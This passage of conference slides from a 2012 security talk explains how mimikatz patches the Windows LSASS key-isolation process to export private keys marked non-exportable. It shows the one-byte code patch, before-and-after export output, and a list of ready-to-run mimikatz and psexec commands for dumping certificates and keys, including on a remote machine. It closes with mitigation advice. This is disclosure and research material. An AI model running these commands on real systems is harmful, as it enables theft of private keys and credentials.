mimikatz crypto::patchcapi only deal with :– Microsoft Base Cryptographic Provider v1.0– Microsoft Enhanced Cryptographic Provider v1.0– Microsoft Enhanced RSA and AES Cryptographic Provider– Microsoft RSA SChannel Cryptographic Provider– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 46
mimikatz :: crypto :: cnghow it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.
This time, keys operations are not made in the “user” process context
Process use RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI…– It is, but it’s not perfect…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 47
mimikatz :: crypto :: cnghow it’s exported ( level)
KeyIso Service (LSASS Process)
07/11/2012
Process
CNG
Exportable ?Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 48
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey
This function do all the work to prepare the export, and check if the key is exportable
07/11/2012
mimikatz # crypto::exportKeys[user] Clés CNG : - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabilité : NON Taille clé : 2048 Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
Exportable ?
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 49
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS
This time, checks and keys are in LSASS process…And what ?
I wrote “1” byte in LSASS memory space…
07/11/2012
.text:6C815210 75 1C jnz short continue_key_export
.text:6C815210 EB 1C jmp short continue_key_export
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 50
mimikatz :: crypto :: patchcngdemo time !
Import, export, import as not exportable…. export again
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 51
mimikatz :: crypto :: patchcnglimitations
Patch operation needs some privileges– Admin (debug privilege)– SYSTEM
mimikatz crypto::patchcng only deal with :– Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz, but MMC addin for certificates cannot export CNG certificates… even those that are exportable (hu ?)
– certutil can…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 52
mimikatz :: crypto :: patchcngbonus
After one admin patched LSASS, all users of current system benefit of extra exports– until reboot / KeyIso service restart
Some others programs that doesn’t check the export flag before asking export can work too– Yeah, like the old good one : certutil
07/11/2012
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfxMY================ Certificat 1 ================[…]Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage ProviderLa clé privée NE PEUT PAS être exportéeSuccès du test de chiffrementCertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfxMY================ Certificat 1 ================[…]Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage ProviderSuccès du test de chiffrementCertUtil: -exportPFX La commande s'est terminée correctement.
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 53
mimikatz :: cryptomemo
Some commands : mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password :– PFX files are protected by this password : mimikatz
Keys– When you import multiple time a certificate, exportable or not, Windows make duplicate keys– When you delete a certificate, Windows does not delete its private key… funny isn’t it ?
• So yes, mimikatz can export it
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 54
mimikatz :: cryptowhat we can do ?
Exactly the same as for sekurlsa, it will prevent access to accounts / computer !– no admin, no admin, no admin…
Basics– Use smartcards/token for users certificates– Use Hardware Security Modules (HSM), even SoftHSM
More in depth– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP• Their biometrics stuff was a little buggy ;)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 55
mimikatzwhat else can it do ?
Play with minesweeperManipulate some handlesPass the hashDump SAM / ADStop event monitoringPatch Terminal ServerBasic GPO bypassApplocker / SRP bypassDriver
– Play with tokens & privileges– Display SSDT x86 & x64– List minifilters actions– List Notifications (process / thread / image / registry)– List Objects hooks and procedures– …
…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 56
mimikatzthat’s all folks !
Thanks’ to / Merci à :
– my girlfriend for her support (her LSASS crashed few times)– Application Security Forum to offer me this great opportunity
• Partners and Sponsors for sure !
– Microsoft to always consider it as normal/acceptable – Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention !
Questions ?
Don’t be shy ;)especially if you have written the corresponding slide number
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 57
Blog, Source Code & Contact
blog http://blog.gentilkiwi.commimikatz http://blog.gentilkiwi.com/mimikatzsource https://code.google.com/p/mimikatz/email [email protected]
07/11/2012